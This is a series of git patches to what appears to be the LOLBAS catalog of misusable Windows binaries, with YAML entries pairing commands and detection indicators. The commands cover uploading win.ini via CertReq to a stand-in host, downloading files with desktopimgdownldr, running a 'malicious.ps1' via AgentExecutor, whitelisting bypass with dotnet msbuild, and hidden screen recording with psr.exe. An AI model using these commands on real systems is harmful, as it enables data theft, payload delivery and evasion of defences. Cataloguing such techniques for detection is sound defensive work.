https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx +Acknowledgement: + - Person: Leon Rodenko + Handle: @L3m0nada +--- From 48722da65c2e2e88469f1c37de52b30c5d2a0c5c Mon Sep 17 00:00:00 2001 From: Lemonada Date: Sat, 27 Jun 2020 14:50:22 +0300 Subject: [PATCH 34/96] Delete Psr.yml --- Psr.yml | 28 ---------------------------- 1 file changed, 28 deletions(-) delete mode 100644 Psr.yml diff --git a/Psr.yml b/Psr.yml deleted file mode 100644 index 8335fec..0000000 --- a/Psr.yml +++ /dev/null @@ -1,28 +0,0 @@ ---- -Name: Psr.exe -Description: Windows Problem Steps Recorder, used to record screen and clicks. -Author: Leon Rodenko -Created: '2020-06-27 -Commands: - - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 - Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. - Usecase: Can be used to take screenshots of the user environment - Category: Reconnaissance - Privileges: User - MitreID: T1113 - MitreLink: https://attack.mitre.org/techniques/T1113/ - OperatingSystem: since Windows 7 (client) / Windows 2008 R2 -Full_Path: - - Path: c:\windows\system32\psr.exe - - Path: c:\windows\syswow64\psr.exe -Code_Sample: - - Code: -Detection: - - IOC: psr.exe spawned - - IOC: suspicious activity when running with "/gui 0" flag -Resources: - - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx -Acknowledgement: - - Person: Leon Rodenko - Handle: @L3m0nada ---- From 2a5a4e391d5f2c3ead6dd0573b900a4dd73a9781 Mon Sep 17 00:00:00 2001 From: Lemonada Date: Sat, 27 Jun 2020 14:51:07 +0300 Subject: [PATCH 35/96] Create Psr.yml take screenshots of user sessions --- yml/OSBinaries/Psr.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 yml/OSBinaries/Psr.yml diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml new file mode 100644 index 0000000..8335fec --- /dev/null +++ b/yml/OSBinaries/Psr.yml @@ -0,0 +1,28 @@ +--- +Name: Psr.exe +Description: Windows Problem Steps Recorder, used to record screen and clicks. +Author: Leon Rodenko +Created: '2020-06-27 +Commands: + - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 + Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. + Usecase: Can be used to take screenshots of the user environment + Category: Reconnaissance + Privileges: User + MitreID: T1113 + MitreLink: https://attack.mitre.org/techniques/T1113/ + OperatingSystem: since Windows 7 (client) / Windows 2008 R2 +Full_Path: + - Path: c:\windows\system32\psr.exe + - Path: c:\windows\syswow64\psr.exe +Code_Sample: + - Code: +Detection: + - IOC: psr.exe spawned + - IOC: suspicious activity when running with "/gui 0" flag +Resources: + - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx +Acknowledgement: + - Person: Leon Rodenko + Handle: @L3m0nada +--- From fd01a9151a070dcf64f3f5e191785b39381b0ed5 Mon Sep 17 00:00:00 2001 From: Kristal-g Date: Thu, 2 Jul 2020 20:46:05 +0300 Subject: [PATCH 36/96] Added desktopimgdownldr.exe --- yml/OSBinaries/desktopimgdownldr.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 yml/OSBinaries/desktopimgdownldr.yml diff --git a/yml/OSBinaries/desktopimgdownldr.yml b/yml/OSBinaries/desktopimgdownldr.yml new file mode 100644 index 0000000..4ce606c --- /dev/null +++ b/yml/OSBinaries/desktopimgdownldr.yml @@ -0,0 +1,27 @@ +--- +Name: desktopimgdownldr.exe +Description: Windows binary used to configure lockscreen/desktop image +Author: Gal Kristal +Created: 28/06/2020 +Commands: + - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr + Description: Downloads the file and sets it as the computer's lockscreen + Usecase: Download arbitrary files from a web server + Category: Download + Privileges: User + MitreID: - T1105 + MitreLink: - https://attack.mitre.org/techniques/T1105/ + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\windows\system32\desktopimgdownldr.exe +Code_Sample: + - Code: +Detection: + - IOC: desktopimgdownldr.exe that creates non-image file + - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl +Resources: + - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ +Acknowledgement: + - Person: Gal Kristal + Handle: @gal_kristal +--- \ No newline at end of file From 794d3c04ccf1ecc172c2cb28338f99b00a057197 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Fri, 3 Jul 2020 14:03:51 +0200 Subject: [PATCH 37/96] Added Acknowledgement to rundll32 --- yml/OSBinaries/Rundll32.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index d7f9f60..2b7c2b1 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -92,4 +92,6 @@ Acknowledgement: Handle: '@bohops' - Person: Sailay Handle: '@404death' + - Person: Martin Ingesen + Handle: '@Mrtn9' --- From 416680941da09ef71a720d5d2400a187de52d78f Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Fri, 3 Jul 2020 14:52:29 +0200 Subject: [PATCH 38/96] Rename explorer.yml to Explorer.yml Changed capitalization --- yml/OSBinaries/{explorer.yml => Explorer.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename yml/OSBinaries/{explorer.yml => Explorer.yml} (99%) diff --git a/yml/OSBinaries/explorer.yml b/yml/OSBinaries/Explorer.yml similarity index 99% rename from yml/OSBinaries/explorer.yml rename to yml/OSBinaries/Explorer.yml index 73ef496..35ea876 100644 --- a/yml/OSBinaries/explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Jai Minton Handle: '@CyberRaiju' ---- \ No newline at end of file +--- From dac58c312fb604837e78edd3cc7312ff8564e40d Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Fri, 3 Jul 2020 14:59:50 +0200 Subject: [PATCH 39/96] Fixed some missing quotes and stuff on psr.exe --- yml/OSBinaries/Psr.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml index 8335fec..4a37660 100644 --- a/yml/OSBinaries/Psr.yml +++ b/yml/OSBinaries/Psr.yml @@ -2,7 +2,7 @@ Name: Psr.exe Description: Windows Problem Steps Recorder, used to record screen and clicks. Author: Leon Rodenko -Created: '2020-06-27 +Created: '2020-06-27' Commands: - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. @@ -24,5 +24,5 @@ Resources: - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx Acknowledgement: - Person: Leon Rodenko - Handle: @L3m0nada + Handle: '@L3m0nada' --- From 7dfbc7af6716aa41d3e7e3df5d1d9c92a42f9528 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Fri, 3 Jul 2020 15:04:09 +0200 Subject: [PATCH 40/96] Update and rename desktopimgdownldr.yml to Desktopimgdownldr.yml Changed capitalization --- .../{desktopimgdownldr.yml => Desktopimgdownldr.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename yml/OSBinaries/{desktopimgdownldr.yml => Desktopimgdownldr.yml} (96%) diff --git a/yml/OSBinaries/desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml similarity index 96% rename from yml/OSBinaries/desktopimgdownldr.yml rename to yml/OSBinaries/Desktopimgdownldr.yml index 4ce606c..8567569 100644 --- a/yml/OSBinaries/desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -1,5 +1,5 @@ --- -Name: desktopimgdownldr.exe +Name: Desktopimgdownldr.exe Description: Windows binary used to configure lockscreen/desktop image Author: Gal Kristal Created: 28/06/2020 @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Gal Kristal Handle: @gal_kristal ---- \ No newline at end of file +--- From 420860e5f7daec8e7213495f4afc2c68259404f4 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Fri, 3 Jul 2020 15:05:33 +0200 Subject: [PATCH 41/96] Adjusted some missing quotes and stuff on Dekstopimgdownldr --- yml/OSBinaries/Desktopimgdownldr.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 8567569..97b2f85 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -9,8 +9,8 @@ Commands: Usecase: Download arbitrary files from a web server Category: Download Privileges: User - MitreID: - T1105 - MitreLink: - https://attack.mitre.org/techniques/T1105/ + MitreID: T1105 + MitreLink: https://attack.mitre.org/techniques/T1105/ OperatingSystem: Windows 10 Full_Path: - Path: c:\windows\system32\desktopimgdownldr.exe @@ -23,5 +23,5 @@ Resources: - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ Acknowledgement: - Person: Gal Kristal - Handle: @gal_kristal + Handle: '@gal_kristal' --- From cb3a45008ef39fe5c0c7c310146d3951eedf8d2c Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Fri, 3 Jul 2020 15:40:58 +0200 Subject: [PATCH 42/96] Added regini.exe writing to registry using ADS --- yml/OSBinaries/Regini.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 yml/OSBinaries/Regini.yml diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml new file mode 100644 index 0000000..ce20f4c --- /dev/null +++ b/yml/OSBinaries/Regini.yml @@ -0,0 +1,27 @@ +--- +Name: Regini.exe +Description: Used to manipulate the registry +Author: 'Oddvar Moe' +Created: '2020-07-03' +Commands: + - Command: regini.exe newfile.txt:hidden.ini + Description: Write registry keys from data inside the Alternate data stream. + Usecase: Write to registry + Category: ADS + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\regini.exe + - Path: C:\Windows\SysWOW64\regini.exe +Code_Sample: +- Code: +Detection: + - IOC: regini.exe reading from ADS +Resources: + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Eli Salem + Handle: '@elisalem9' +--- \ No newline at end of file From 17a34e27f60f0025346ab8c15a9073a144596779 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 10:03:42 -0400 Subject: [PATCH 43/96] Added Twitter reference for use "in-the-wild" --- yml/OSScripts/Manage-bde.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index 8d98bef..86024e6 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -29,9 +29,12 @@ Detection: Resources: - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 - Link: https://twitter.com/bohops/status/980659399495741441 + - Link: https://twitter.com/JohnLaTwC/status/1223292479270600706 Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Daniel Bohannon Handle: '@danielbohannon' ---- \ No newline at end of file + - Person: John Lambert + - Handle: '@JohnLaTwC' +--- From 12cdb47285a8e74146b7826d7603de940ce3bfa3 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 10:07:18 -0400 Subject: [PATCH 44/96] Removed COM Hijack --- yml/OSScripts/Winrm.yml | 8 -------- 1 file changed, 8 deletions(-) diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 76bc036..d2ea85e 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -4,14 +4,6 @@ Description: Script used for manage Windows RM settings Author: 'Oddvar Moe' Created: '2018-05-25' Commands: - - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig - Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1216 - MitreLink: https://attack.mitre.org/wiki/Technique/T1216 - OperatingSystem: Windows 10 - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol Usecase: Proxy execution From e316cb4842dd4e79630293546ba86c614985a765 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 10:15:06 -0400 Subject: [PATCH 45/96] Delete Slmgr - COM Hijacks are too broad --- yml/OSScripts/Slmgr.yml | 31 ------------------------------- 1 file changed, 31 deletions(-) delete mode 100644 yml/OSScripts/Slmgr.yml diff --git a/yml/OSScripts/Slmgr.yml b/yml/OSScripts/Slmgr.yml deleted file mode 100644 index 8f04c38..0000000 --- a/yml/OSScripts/Slmgr.yml +++ /dev/null @@ -1,31 +0,0 @@ ---- -Name: Slmgr.vbs -Description: Script used to manage windows license activation -Author: 'Oddvar Moe' -Created: '2018-05-25' -Commands: - - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs - Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1216 - MitreLink: https://attack.mitre.org/wiki/Technique/T1216 - OperatingSystem: Windows 10 -Full_Path: - - Path: C:\Windows\System32\slmgr.vbs - - Path: C:\Windows\SysWOW64\slmgr.vbs -Code_Sample: - - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct - - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg -Detection: - - IOC: -Resources: - - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - - Link: https://www.youtube.com/watch?v=3gz1QmiMhss -Acknowledgement: - - Person: Matt Nelson - Handle: '@enigma0x3' - - Person: Casey Smith - Handle: '@subtee' ---- \ No newline at end of file From f1a7ad92dd00dd63fd9ef8aa0106e5212dbfcec4 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 10:24:34 -0400 Subject: [PATCH 46/96] Changed privilege level for registration --- yml/OSBinaries/Regsvcs.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index a89ca2e..d164ef2 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -8,7 +8,7 @@ Commands: Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute - Privileges: User + Privileges: Local Admin MitreID: T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -34,4 +34,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- From a976eaefe1c4eb1aab3bdc4888a6fc67bd8259f8 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 10:35:01 -0400 Subject: [PATCH 47/96] Updated Mitre Reference - T1096 --- yml/OSBinaries/Certutil.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index db1e9a8..11fc80d 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -25,8 +25,8 @@ Commands: Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Category: ADS Privileges: User - MitreID: T1105 - MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + MitreID: T1096 + MitreLink: https://attack.mitre.org/techniques/T1096 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: certutil -encode inputFileName encodedOutputFileName Description: Command to encode a file using Base64 From 92f020b885c1009d79812bfd4e2e928eca9334c0 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 14:56:06 -0400 Subject: [PATCH 48/96] Added dotnet msbuild awl bypass technique --- yml/OtherMSBinaries/Dotnet.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 5475947..59e1f31 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -19,13 +19,24 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with .NET installed + - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] + Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 with .NET Core installed Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: - IOC: dotnet.exe spawned an unknown process Resources: - Link: https://twitter.com/_felamos/status/1204705548668555264 + - Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc + - Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/ Acknowledgement: - Person: felamos Handle: '@_felamos' + - Person: Jimmy + Handle: '@bohops' --- From 343a0e247885d3c96ca6ec80cd5ea984fb8199b1 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 15:03:07 -0400 Subject: [PATCH 49/96] Added plain explorer execution --- yml/OSBinaries/Explorer.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 35ea876..336f44b 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -12,6 +12,14 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: explorer.exe C:\Windows\System32\notepad.exe + Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe + Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 (Tested) Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe @@ -21,7 +29,11 @@ Detection: - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this. Resources: - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 + - Link: https://twitter.com/bohops/status/1276356245541335048 + - Link: https://twitter.com/bohops/status/986984122563391488 Acknowledgement: - Person: Jai Minton Handle: '@CyberRaiju' + - Person: Jimmy + Handle: '@bohops' --- From 640e7f2d65dc1fa90462b7390fbbe98cfa8b881e Mon Sep 17 00:00:00 2001 From: Maxime Nadeau Date: Fri, 3 Jul 2020 16:59:53 -0400 Subject: [PATCH 50/96] Added a Windows 10 2004 version --- yml/OSBinaries/Ttdinject.yml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 23630e8..b208c85 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -4,6 +4,14 @@ Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying cal Author: 'Maxime Nadeau' Created: '2020-05-12' Commands: + - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" + Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. + Usecase: Spawn process using other binary + Category: Execute + Privileges: Administrator + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 2004 - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary @@ -11,7 +19,7 @@ Commands: Privileges: Administrator MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows 10 1809 and newer + OperatingSystem: Windows 10 1909 Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe From aa88bf814468b9cbb8be7a51d629364ce14403b6 Mon Sep 17 00:00:00 2001 From: "@dtmsecurity" Date: Tue, 7 Jul 2020 21:09:06 +0100 Subject: [PATCH 51/96] Create certreq.yml --- yml/OSBinaries/certreq.yml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 yml/OSBinaries/certreq.yml diff --git a/yml/OSBinaries/certreq.yml b/yml/OSBinaries/certreq.yml new file mode 100644 index 0000000..b02f001 --- /dev/null +++ b/yml/OSBinaries/certreq.yml @@ -0,0 +1,36 @@ +--- +Name: CertReq.exe +Description: Used for requesting and managing certificates +Author: 'David Middlehurst' +Created: '2020-07-07' +Commands: + - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt + Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal + Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST + Usecase: Upload + Category: Upload + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\certreq.exe + - Path: C:\Windows\SysWOW64\certreq.exe +Code_Sample: + - Code: +Detection: + - IOC: certreq creates new files + - IOC: certreq makes POST requests +Resources: + - Link: https://dtm.uk/certreq +Acknowledgement: + - Person: David Middlehurst + Handle: '@dtmsecurity' +--- \ No newline at end of file From 3710c1c9721428012c5ae01f93998f354a7c4195 Mon Sep 17 00:00:00 2001 From: Eleftherios Panos Date: Thu, 23 Jul 2020 13:58:30 +0300 Subject: [PATCH 52/96] Added method for AgentExecutor --- yml/OtherMSBinaries/agentexecutor.yml | 34 +++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 yml/OtherMSBinaries/agentexecutor.yml diff --git a/yml/OtherMSBinaries/agentexecutor.yml b/yml/OtherMSBinaries/agentexecutor.yml new file mode 100644 index 0000000..79a19d4 --- /dev/null +++ b/yml/OtherMSBinaries/agentexecutor.yml @@ -0,0 +1,34 @@ +--- +Name: AgentExecutor.exe +Description: Intune Management Extension included on Intune Managed Devices +Author: 'Eleftherios Panos' +Created: '23/07/2020' +Commands: + - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 + Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument + Usecase: Execute unsigned powershell scripts + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 + - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 + Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully + Usecase: Execute a provided EXE + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Intune Management Extension +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: +Acknowledgement: + - Person: Eleftherios Panos + Handle: @lefterispan +--- \ No newline at end of file From 689c3b1fea6893afe557eccc71cdd4edabc96897 Mon Sep 17 00:00:00 2001 From: "Chris \"Lopi\" Spehn" Date: Tue, 4 Aug 2020 07:40:48 -0600 Subject: [PATCH 53/96] Update Regsvcs.yml Fixed inaccurate permissions --- yml/OSBinaries/Regsvcs.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index d164ef2..274d275 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -16,7 +16,7 @@ Commands: Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL bypass - Privileges: User + Privileges: Local Admin MitreID: T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 From 3a3d28e49683912fc606f15fd4552df5dc591c47 Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Sat, 8 Aug 2020 14:59:15 +0300 Subject: [PATCH 54/96] Update Extrac32.yml another use case for extrace32. --- yml/OSBinaries/Extrac32.yml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index e243ed2..a19db9c 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -28,6 +28,14 @@ Commands: MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\*\Desktop\calc.exe + Description: Command for copying calc.exe to another folder + Usecase: Copy file + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe @@ -40,8 +48,10 @@ Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://twitter.com/egre55/status/985994639202283520 Acknowledgement: + - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit + - Person: Tamir Yehuda https://github.com/tamirye - Person: egre55 Handle: '@egre55' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- From 2450b9fc0abad0f9c4f93fe47d350df3610b962f Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Sat, 8 Aug 2020 15:01:46 +0300 Subject: [PATCH 55/96] Update Extrac32.yml --- yml/OSBinaries/Extrac32.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index a19db9c..2e00049 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -49,7 +49,9 @@ Resources: - Link: https://twitter.com/egre55/status/985994639202283520 Acknowledgement: - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit + - handle: @VakninHai - Person: Tamir Yehuda https://github.com/tamirye + - handle: @tim8288 - Person: egre55 Handle: '@egre55' - Person: Oddvar Moe From be19ca53ed9476a23785039802f4938edc023cf0 Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Sat, 8 Aug 2020 15:02:05 +0300 Subject: [PATCH 56/96] Update Extrac32.yml --- yml/OSBinaries/Extrac32.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 2e00049..7b913cb 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -48,12 +48,12 @@ Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://twitter.com/egre55/status/985994639202283520 Acknowledgement: - - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit - - handle: @VakninHai - - Person: Tamir Yehuda https://github.com/tamirye - - handle: @tim8288 - Person: egre55 Handle: '@egre55' - Person: Oddvar Moe Handle: '@oddvarmoe' + - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit + - handle: @VakninHai + - Person: Tamir Yehuda 